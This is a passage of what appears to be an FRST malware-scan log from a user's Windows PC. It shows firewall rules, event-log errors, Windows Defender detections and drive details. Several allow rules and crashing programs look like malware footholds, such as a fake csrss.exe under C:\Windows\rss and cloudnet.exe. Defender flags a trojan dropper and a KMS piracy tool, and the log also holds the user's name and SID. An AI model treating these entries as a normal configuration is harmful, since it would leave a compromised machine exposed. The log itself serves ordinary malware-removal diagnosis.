FirewallRules: [{EAE5D2C0-A1B5-43CB-9869-FE1AFD08251F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A60D81C9-0E30-4408-B849-D94F96967EBA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A2F9172F-70F5-427D-9D63-871D721DAF73}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A72D3FEB-16D2-441F-861C-B2D4860D997F}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5F210438-82E6-473E-9308-1EAF6A74B3A4}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{AD2D26E5-9037-44D9-AFAC-AA6735C8E3CF}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F84086F5-A753-4637-938F-6553607CDDB5}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C1F29FC0-E1D0-4EBF-836A-CCB2F472FBFC}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{27307231-490C-404F-9E3E-73239D7388C2}] => (Allow) C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{AF4CF425-9CD2-4FCE-97C5-7E51CF88DA93}D:\counter-strike16\hl.exe] => (Allow) D:\counter-strike16\hl.exe
FirewallRules: [UDP Query User{365C2508-EBF2-4740-9783-F938B941C519}D:\counter-strike16\hl.exe] => (Allow) D:\counter-strike16\hl.exe
FirewallRules: [TCP Query User{68235CE2-75A1-4390-8015-F1289E2ACD3A}D:\counter-strike16\counter-strike\hl.exe] => (Allow) D:\counter-strike16\counter-strike\hl.exe
FirewallRules: [UDP Query User{A8C6988A-3190-47FB-B6C0-B28442B1958E}D:\counter-strike16\counter-strike\hl.exe] => (Allow) D:\counter-strike16\counter-strike\hl.exe
FirewallRules: [TCP Query User{C593852D-DDC4-4DD2-B178-BDC998E67E96}D:\counter-strike 1.6 omonas\hl.exe] => (Allow) D:\counter-strike 1.6 omonas\hl.exe
FirewallRules: [UDP Query User{4B707B32-DC1E-4DBA-BA12-8BDE94DD60FD}D:\counter-strike 1.6 omonas\hl.exe] => (Allow) D:\counter-strike 1.6 omonas\hl.exe
FirewallRules: [{D069E836-26E2-4CC1-B0E6-2359E7E53BED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{F07B5C9B-C169-46F3-A253-54AD6FC3C6E4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{9BD55B4C-62B6-4CEA-AE3E-B5D658D84E66}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{DCB08F83-E818-421C-98EF-F76E8744C251}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{5DB67347-466D-476E-8102-01C6EB0C18C6}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{51BD13BC-4468-4C3F-8909-53DEA96DF390}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [TCP Query User{3000EB73-C090-4700-88DC-50DEC356E7FB}C:\program files (x86)\java\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\java\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{3314993A-2F98-498C-9B2C-A1BFE558ECD6}C:\program files (x86)\java\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\java\1.8.0_25\bin\javaw.exe
FirewallRules: [{88CE8C24-9032-4C5A-B77F-DCF3E47C44FB}] => (Block) LPort=445
FirewallRules: [{4A78A676-78CC-4588-A03A-B7F63E933B6B}] => (Block) LPort=445
FirewallRules: [TCP Query User{3E1455F6-29AC-45E2-B810-2C5CD6BA67EB}D:\counter-strike\hl.exe] => (Allow) D:\counter-strike\hl.exe
FirewallRules: [UDP Query User{D0943193-3AFE-4505-966A-3910B8E37409}D:\counter-strike\hl.exe] => (Allow) D:\counter-strike\hl.exe
FirewallRules: [{9165DCB3-434B-4BEB-AAFE-C593CEB8461E}] => (Allow) C:\Program Files (x86)\UnHackMe\Unhackme.exe
FirewallRules: [{B12882B0-998C-495C-B88B-216094E4AB63}] => (Allow) C:\Program Files (x86)\UnHackMe\Unhackme.exe
FirewallRules: [{16C33D5A-304E-4107-B629-C6482B24B2E6}] => (Allow) C:\Program Files (x86)\New Steam\Steam.exe
FirewallRules: [{07E643FE-78E6-473E-B874-499C069DF0BB}] => (Allow) C:\Program Files (x86)\New Steam\Steam.exe
FirewallRules: [{E1B50FB6-73C2-4658-8C8A-869C9D369C1B}] => (Allow) C:\Program Files (x86)\New Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{31DC38C4-E860-4BBE-98CB-D9ECA480D5AB}] => (Allow) C:\Program Files (x86)\New Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{A32C266E-F4B9-4F8F-8957-DDDFBA640581}D:\warzone\counter strike source warzone\hl2.exe] => (Allow) D:\warzone\counter strike source warzone\hl2.exe
FirewallRules: [UDP Query User{C19EC73A-9A3A-4470-BB6E-A7B7202BC898}D:\warzone\counter strike source warzone\hl2.exe] => (Allow) D:\warzone\counter strike source warzone\hl2.exe
FirewallRules: [TCP Query User{5DC8D3B3-1495-4E6B-8126-7D3F363E13BC}D:\counter strike 1.6\hl.exe] => (Allow) D:\counter strike 1.6\hl.exe
FirewallRules: [UDP Query User{F8AC1DFC-EC72-40FE-A699-DFA7AE480C50}D:\counter strike 1.6\hl.exe] => (Allow) D:\counter strike 1.6\hl.exe
FirewallRules: [{56FACAB1-197E-438C-A897-F2D3D3F2B3D6}] => (Allow) C:\Program Files (x86)\Cracked Steam\steam.exe
FirewallRules: [{AF4C0982-861F-44B1-9079-6CFB92DDB08A}] => (Allow) C:\Program Files (x86)\Cracked Steam\steam.exe
FirewallRules: [TCP Query User{26FB80E2-22E4-4751-8DD3-4ACB6BAC16F6}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{12A70A96-FE45-4E0E-BFA8-808BA49CACE6}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe
FirewallRules: [TCP Query User{D5CB2434-3031-4F1C-A2C2-E85C30DF4289}D:\counter-strike-1.9\hl.exe] => (Allow) D:\counter-strike-1.9\hl.exe
FirewallRules: [UDP Query User{4A2BF466-63E3-4372-A5F6-9AEFC5C6EC69}D:\counter-strike-1.9\hl.exe] => (Allow) D:\counter-strike-1.9\hl.exe
FirewallRules: [TCP Query User{E611AC8A-F993-4744-927E-7F3E70135B0C}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [UDP Query User{1FB75818-EB94-4EA0-9062-F9140E65FBC1}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [TCP Query User{BBACC947-49D3-4397-84B0-6AA018E31C6C}D:\strogino cs portal\counter-strike global offensive\csgo.exe] => (Allow) D:\strogino cs portal\counter-strike global offensive\csgo.exe
FirewallRules: [UDP Query User{FBEF990D-0679-4581-8188-EAB7F466F313}D:\strogino cs portal\counter-strike global offensive\csgo.exe] => (Allow) D:\strogino cs portal\counter-strike global offensive\csgo.exe
FirewallRules: [TCP Query User{C6999F39-0EF4-4DD4-86F8-51EFA213E179}D:\strogino cs portal\counter-strike source\hl2.exe] => (Allow) D:\strogino cs portal\counter-strike source\hl2.exe
FirewallRules: [UDP Query User{9BAA31E3-1E92-4EDC-BBE1-A3AC98A9EF87}D:\strogino cs portal\counter-strike source\hl2.exe] => (Allow) D:\strogino cs portal\counter-strike source\hl2.exe
FirewallRules: [TCP Query User{E9ED3ACC-3FF7-4706-99CE-86DD4480667B}D:\counter strike steam update\hl.exe] => (Allow) D:\counter strike steam update\hl.exe
FirewallRules: [UDP Query User{E2874894-1DD9-4F86-9533-39EF959B3141}D:\counter strike steam update\hl.exe] => (Allow) D:\counter strike steam update\hl.exe
FirewallRules: [TCP Query User{307A61AD-59E5-471E-97D3-56FC425C0233}D:\counter strike steam update\hlds.exe] => (Allow) D:\counter strike steam update\hlds.exe
FirewallRules: [UDP Query User{1BA87FE2-433E-45BC-B3F8-7EF72455A2E2}D:\counter strike steam update\hlds.exe] => (Allow) D:\counter strike steam update\hlds.exe
FirewallRules: [{27AC7942-AD31-48D7-8072-1384F615EC37}] => (Allow) 㩃啜敳獲䍜慲楣湵䅜灰慄慴剜慯業杮獜湳獜湳攮數
FirewallRules: [{C70C1CD3-BAAC-4591-BB7A-28ED2A71746B}] => (Allow) 㩃啜敳獲䍜慲楣湵䅜灰慄慴剜慯業杮獜湳獜癡略⹰硥e
FirewallRules: [{A3E9DB0D-9DD6-425D-BC59-0EA67E759486}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{D3E6937A-5544-4CE5-983F-0A8534FD6FCC}] => (Allow) C:\Program Files (x86)\Driver Updater Plus\dup.exe
FirewallRules: [{46FCC938-B327-47E3-841A-313A3BB5AA11}] => (Allow) C:\Program Files (x86)\UnHackMe\GWebUpdate.exe
FirewallRules: [{EA9FACF3-2663-4FB1-B977-F30E04C7FD32}] => (Allow) C:\Program Files (x86)\UnHackMe\GWebUpdate.exe
FirewallRules: [{9C818E4A-C31C-41D4-A957-658B7CEDC13A}] => (Allow) D:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{126F6125-15C6-4FA2-8295-0C42C949BF89}] => (Allow) D:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{3275F799-057B-4AB3-B5A1-05C86B05D63A}D:\counter-strike 1.6 (2017-06-27)\hl.exe] => (Allow) D:\counter-strike 1.6 (2017-06-27)\hl.exe
FirewallRules: [UDP Query User{1E197E1F-0BF8-4B89-A1AD-75A18CA347C6}D:\counter-strike 1.6 (2017-06-27)\hl.exe] => (Allow) D:\counter-strike 1.6 (2017-06-27)\hl.exe
FirewallRules: [TCP Query User{12BFC6DA-0C7C-42E5-BA5B-652F282907F3}D:\cs16-2017\hl.exe] => (Allow) D:\cs16-2017\hl.exe
FirewallRules: [UDP Query User{F198ED93-91AD-43A0-B1B1-94B618834E36}D:\cs16-2017\hl.exe] => (Allow) D:\cs16-2017\hl.exe
FirewallRules: [TCP Query User{3A16ECEB-E54C-42A6-98AA-B04277D363D1}D:\counter-strike-2.0\hl.exe] => (Allow) D:\counter-strike-2.0\hl.exe
FirewallRules: [UDP Query User{EC96ABF2-80E7-474A-88E5-4CF025197D92}D:\counter-strike-2.0\hl.exe] => (Allow) D:\counter-strike-2.0\hl.exe
FirewallRules: [TCP Query User{F6A063E0-5472-4A28-B682-7D6D6FC08569}D:\counter strike amd\hl.exe] => (Allow) D:\counter strike amd\hl.exe
FirewallRules: [UDP Query User{634FA95F-3157-4857-B703-A8CC221BCDE9}D:\counter strike amd\hl.exe] => (Allow) D:\counter strike amd\hl.exe
FirewallRules: [TCP Query User{9AA7CCC2-E540-4F33-B89B-A48F43253AE6}D:\counter-strike\hlds.exe] => (Allow) D:\counter-strike\hlds.exe
FirewallRules: [UDP Query User{E492235D-CC67-4D6E-A0EA-A77F91589D62}D:\counter-strike\hlds.exe] => (Allow) D:\counter-strike\hlds.exe
FirewallRules: [TCP Query User{2E4C58EF-0615-4E9F-97F0-6A720251CB54}D:\counter-strike 1.6 non steam\hl.exe] => (Allow) D:\counter-strike 1.6 non steam\hl.exe
FirewallRules: [UDP Query User{EB4E7949-A48B-4EF1-8203-0B384D426B1B}D:\counter-strike 1.6 non steam\hl.exe] => (Allow) D:\counter-strike 1.6 non steam\hl.exe
FirewallRules: [TCP Query User{44580F86-4370-4140-A624-7E9A22FB9984}C:\users\craciun\appdata\local\warthunder\launcher.exe] => (Allow) C:\users\craciun\appdata\local\warthunder\launcher.exe
FirewallRules: [UDP Query User{01ECB409-A03D-41D7-AD28-538D48DC19DA}C:\users\craciun\appdata\local\warthunder\launcher.exe] => (Allow) C:\users\craciun\appdata\local\warthunder\launcher.exe
FirewallRules: [TCP Query User{4FF6BF3C-F33A-4A94-A1E5-E586B0A524F6}D:\world_of_tanks\wotlauncher.exe] => (Allow) D:\world_of_tanks\wotlauncher.exe
FirewallRules: [UDP Query User{D3BB54F5-168D-4D17-8166-2FB86DF03E05}D:\world_of_tanks\wotlauncher.exe] => (Allow) D:\world_of_tanks\wotlauncher.exe
FirewallRules: [{2644CEA2-83F3-4AD6-8A63-575748B365FD}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{F380ADBE-E45F-42F6-ADB2-9188D4CB6D95}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6C295877-089D-4BCD-A967-8DA1A49B24A0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E1462106-F38C-4A69-BDF4-7950C204B408}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{1030C0E4-423F-4B6A-A49E-947C0C10FFB3}D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe] => (Allow) D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe
FirewallRules: [UDP Query User{B4FF98E5-08A3-412E-A469-6EBCD505E6F0}D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe] => (Allow) D:\nvidia steam counterstrike 2016 update\nsteam counter-strike\hl.exe
FirewallRules: [TCP Query User{D5146035-5584-4567-83C9-397FD5C299D7}C:\users\craciun\desktop\cs16-2017\hl.exe] => (Allow) C:\users\craciun\desktop\cs16-2017\hl.exe
FirewallRules: [UDP Query User{CB159496-17DD-48CF-8885-4B0E8B7D9135}C:\users\craciun\desktop\cs16-2017\hl.exe] => (Allow) C:\users\craciun\desktop\cs16-2017\hl.exe
FirewallRules: [TCP Query User{795136A0-292E-4FB2-BA31-76E85FAF71C2}D:\cs warzone\hl.exe] => (Allow) D:\cs warzone\hl.exe
FirewallRules: [UDP Query User{39E52562-6100-48D6-8689-D6ECC0DB27FD}D:\cs warzone\hl.exe] => (Allow) D:\cs warzone\hl.exe
FirewallRules: [TCP Query User{28B2DC52-BD92-404E-B53C-3A0D54607ECB}D:\counter-strike clean edition\hl.exe] => (Allow) D:\counter-strike clean edition\hl.exe
FirewallRules: [UDP Query User{023FEE50-184F-499A-B1C9-EA173596D789}D:\counter-strike clean edition\hl.exe] => (Allow) D:\counter-strike clean edition\hl.exe
FirewallRules: [{78833D12-C4E1-49DB-A6CC-1AEF4B9DB449}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{E42C9B74-0FFF-459F-90E7-32D0CFA0C605}] => (Allow) C:\WINDOWS\rss\csrss.exe
FirewallRules: [{F7E482B2-8AAB-4F18-98AA-7FC08217FBDF}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\updaterev.exe
FirewallRules: [{EAB1E333-B6C7-463E-BC94-25E572390F20}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{04232483-4B52-4D20-B3B7-A60625DC60E9}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{CEE15CAE-5D72-46C6-A8E2-444FD75D2150}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{1A7809BC-2259-436F-AD75-73E56F135B67}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{7C704E6D-C340-45D5-9BC6-87E074B815C1}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{906035DF-C0AE-44E6-B3D8-2739D9364555}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{5016DA15-A0F7-4EE1-9E1A-1956C2D130B6}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{CA6B358D-C468-4EB1-AAA3-C59DF4094729}] => (Allow) C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{CE9844A6-FB3B-484C-AAB0-4E55FF88EC05}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\app.exe
FirewallRules: [{3F88C8DA-33D7-464D-8F61-CD88E01FA02C}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{586AD05E-B353-4E2B-AC8A-17296870377C}] => (Allow) C:\Windows\System32\rundll32.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/11/2018 09:30:30 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Music.UI.exe version 10.18011.1341.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 61f0
 
Start Time: 01d4014da09f77cd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.18011.13411.1000_x64__8wekyb3d8bbwe\Music.UI.exe
 
Report Id: 2bca29e2-88a1-49bb-acba-c9522ddc8ed6
 
Faulting package full name: Microsoft.ZuneMusic_10.18011.13411.1000_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: Microsoft.ZuneMusic
 
Error: (06/11/2018 08:24:26 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.17134.1 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 43c4
 
Start Time: 01d40141ba5e7d46
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
 
Report Id: 910517d4-e606-4ffe-b952-a20a8c38bc2d
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (06/10/2018 12:05:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Faulting module name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Exception code: 0xc0000409
Fault offset: 0x00000000000067bc
Faulting process id: 0x3058
Faulting application start time: 0x01d4009a10ca84a5
Faulting application path: C:\Windows\TEMP\gC4AF.tmp.exe
Faulting module path: C:\Windows\TEMP\gC4AF.tmp.exe
Report Id: 47597da1-b3d2-4197-a40d-bc85f2922f94
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/10/2018 12:01:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xdd4
Faulting application start time: 0x01d40099294aad24
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: e390688c-5819-4ad1-98b2-5f5392466625
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:41:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Faulting module name: gC4AF.tmp.exe, version: 0.0.0.0, time stamp: 0x5b00ca1a
Exception code: 0xc0000409
Fault offset: 0x00000000000067bc
Faulting process id: 0x2728
Faulting application start time: 0x01d40007cb8406bf
Faulting application path: C:\Windows\TEMP\gC4AF.tmp.exe
Faulting module path: C:\Windows\TEMP\gC4AF.tmp.exe
Report Id: ec5fbacf-5aaf-474e-9951-5a26bb83764d
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:33:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xcec
Faulting application start time: 0x01d40006f3190882
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 5a5f4840-ad8d-4b7b-a1ba-1b2c5ee16884
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:27:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xd70
Faulting application start time: 0x01d400060a6ff92d
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 7d5f3b74-4188-40e4-acb9-87779df3e92e
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (06/09/2018 06:20:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Faulting module name: desktop245.exe, version: 1.0.0.11, time stamp: 0x5b029b40
Exception code: 0xc0000409
Fault offset: 0x0001578c
Faulting process id: 0xcb4
Faulting application start time: 0x01d40004b4062331
Faulting application path: C:\ProgramData\yahoochrome_D\desktop245.exe
Faulting module path: C:\ProgramData\yahoochrome_D\desktop245.exe
Report Id: 26c1c58a-072f-48ef-b0e2-666140d7fcee
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (06/11/2018 09:15:53 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:57:47 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:45:40 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:39:39 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:33:36 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:27:53 PM) (Source: DCOM) (EventID: 10010) (User: ALEX-PC)
Description: The server Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXfbn8w4s0jbk3tjevpcn9kaxerc6rby8k.mca did not register with DCOM within the required timeout.
 
Error: (06/11/2018 08:27:43 PM) (Source: DCOM) (EventID: 10016) (User: ALEX-PC)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (06/11/2018 08:27:33 PM) (Source: DCOM) (EventID: 10001) (User: ALEX-PC)
Description: Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error:
"5"
Happened while starting this command:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 
 
Windows Defender:
===================================
Date: 2018-05-24 08:32:40.439
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:32:18.750
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: TrojanDropper:Win32/Kaymundler.C
ID: 2147709830
Severity: Severe
Category: Trojan Dropper
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit Final.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\System32\SearchProtocolHost.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:32:09.270
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: TrojanDropper:Win32/Kaymundler.C
ID: 2147709830
Severity: Severe
Category: Trojan Dropper
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit Final.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:29:42.219
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe;file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe->[SAResource]->[MSILRES:?.?.resources]
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Windows\explorer.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
Date: 2018-05-24 08:27:10.517
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: High
Category: Tool
Path: file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe;file:_C:\Users\Craciun\Desktop\Microsoft Toolkit.exe->[SAResource]->[MSILRES:?.?.resources]
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Windows\explorer.exe
Signature Version: AV: 1.269.13.0, AS: 1.269.13.0, NIS: 1.269.13.0
Engine Version: AM: 1.1.14901.4, NIS: 1.1.14901.4
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 87%
Total physical RAM: 3985.8 MB
Available physical RAM: 492.68 MB
Total Virtual: 10897.8 MB
Available Virtual: 1926.87 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:96.71 GB) (Free:54.19 GB) NTFS
Drive d: () (Fixed) (Total:200.43 GB) (Free:104.31 GB) NTFS
 
\\?\Volume{7efd9163-b9ab-11e6-9350-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{000cbde6-0000-0000-0000-f03318000000}\ () (Fixed) (Total:0.84 GB) (Free:0.37 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
